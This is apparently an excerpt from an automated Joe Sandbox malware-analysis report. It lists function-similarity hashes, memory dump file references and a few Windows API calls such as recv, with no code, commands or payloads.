                                                                                                                                                                                                        • Instruction ID: 8189d017793a2f4b6c0f54da5c074b4e4bd0a7a8292d6c6b2e0f27faf736153c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 572910dd15077c4ca16147fdc4b83ddcc38155ad015689f4d9ce2ca965bf79cc
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53017BB210C312EFD6C2669415456FBBFB7D943220330445EF4868A542F6453445A661
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268885919992.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 36485a803dc90d60508bb0797fe00d40948980bd07ec3b48a6cff8ebcb5ec1db
                                                                                                                                                                                                        • Instruction ID: fb3d738afff0c5740ea8c961b94becf6141c02afc7861cb0c1178f2ddb9fa109
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36485a803dc90d60508bb0797fe00d40948980bd07ec3b48a6cff8ebcb5ec1db
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31F078F320C211EF91C356C456805F62FBBE942230320440DF847C9641F6697946B575
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268885919992.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: bb0776050e18b343e74e336762b9842e7aeae66072bbde13f6bd6732d5b773d3
                                                                                                                                                                                                        • Instruction ID: 550029be0c15329a541baaacefdfc6766a379a2e2906f55a5fc2ca9c4ba6ca28
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb0776050e18b343e74e336762b9842e7aeae66072bbde13f6bd6732d5b773d3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 95F0ACB320C212EFD2C2B6C051806BB7BBBE986320770041EF042C7500F71A78457462
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268885919992.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 8272e07d49438c5d0340838b17c8316c4c79e6070dab2de1755b5f3dd59de3e6
                                                                                                                                                                                                        • Instruction ID: 1ebb41157c24373a5e67a7293770b85a191ae0437d9c507048185df72ac0fd97
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8272e07d49438c5d0340838b17c8316c4c79e6070dab2de1755b5f3dd59de3e6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31E02BB710C311EF90C267C161406B62B7BE986330360041EF443DA201FB697858A566
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268885919992.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: e3b9b8d75cfd1e0852db5a574ca9c818525cd891a2e30a2803486a02be6aebad
                                                                                                                                                                                                        • Instruction ID: 08acb94cdd63d0cbf31eac40866d4704fd9a8975f229ad279c34a28b01610890
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3b9b8d75cfd1e0852db5a574ca9c818525cd891a2e30a2803486a02be6aebad
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4AE0D8F714C310EFD0C26BC561916767ABBE956230350480EB482DA641FA69781869A6
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268885919992.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 0fcb1dabb6a16d8ac3e967c656654fdfc54ff9ab9cb406b569258ae7f8d71216
                                                                                                                                                                                                        • Instruction ID: 2c232ef824129b249c3585ff200fa8b35d38a6192f1ede5cfe40c2e258105bd4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0fcb1dabb6a16d8ac3e967c656654fdfc54ff9ab9cb406b569258ae7f8d71216
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44D097F7108218A7018132D992683F2AE1B6E2B0203A00025E882AF683F14B0404A5E2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268885919992.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 7f3dd7812c0d61fea4e275a42b672c33e772de5ae17e34bda58036ebdf2d7669
                                                                                                                                                                                                        • Instruction ID: a4894c168baa2a76138f3936d220525d9165b9ae2de8f4887a5bac48351af079
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f3dd7812c0d61fea4e275a42b672c33e772de5ae17e34bda58036ebdf2d7669
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16D022FB20C120EB84C326C661853312E33A8932303B0044BF493DAAC6B48A340979B2
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268885919992.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: e40b885b9f7bc9f9f56883145e2eca2493e286a37320e33aac6a91eeaf9af354
                                                                                                                                                                                                        • Instruction ID: 11e83e940d8eaef59b9591def2418ec9af1fd3c92aa8a914b4681112e1b976cc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e40b885b9f7bc9f9f56883145e2eca2493e286a37320e33aac6a91eeaf9af354
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDC080BB14D010E380C227C695853777D776E631203A10446B0F79B6C7B559344975F3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$Wce
                                                                                                                                                                                                        • API String ID: 0-1233605746
                                                                                                                                                                                                        • Opcode ID: f52c17bb86ab7612d9950c3c553288e678d1fce925ad519347eafc6ade2f740b
                                                                                                                                                                                                        • Instruction ID: a7e6262f800a5b5b49611f240dbc443c51b8ad123270d747320fa874c99ab3aa
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f52c17bb86ab7612d9950c3c553288e678d1fce925ad519347eafc6ade2f740b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DBC22A71E046288FDB64DE28DD407E9B7B6EB8A315F1441EAE84DE7340E775AE818F40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • recv.WS2_32(?,?,00000004,00000000), ref: 0066E10B
                                                                                                                                                                                                        • recv.WS2_32(?,?,00000008,00000000), ref: 0066E140
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_660000_file.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: recv
                                                                                                                                                                                                        • String ID: Wce
                                                                                                                                                                                                        • API String ID: 1507349165-518726228
                                                                                                                                                                                                        • Opcode ID: 27262ac43833b0415ae34c15dc6a592c54e20b1812e47cfecdeca87a7e3d7a09
                                                                                                                                                                                                        • Instruction ID: cd6df7e2d2698ade313a1223e72c653920b86f05624c16e4ac513419067f47fe
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27262ac43833b0415ae34c15dc6a592c54e20b1812e47cfecdeca87a7e3d7a09
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5631F371A002589FD7208B68CC81FFBBBBEEB09734F004629F914E7381C675A8448BA0
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimePreciseAsFileTime.KERNEL32(?,0067CF52,?,00000003,00000003,?,0067CF87,?,?,?,00000003,00000003,?,0067C4FD,00662FB9,00000001), ref: 0067CC03
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
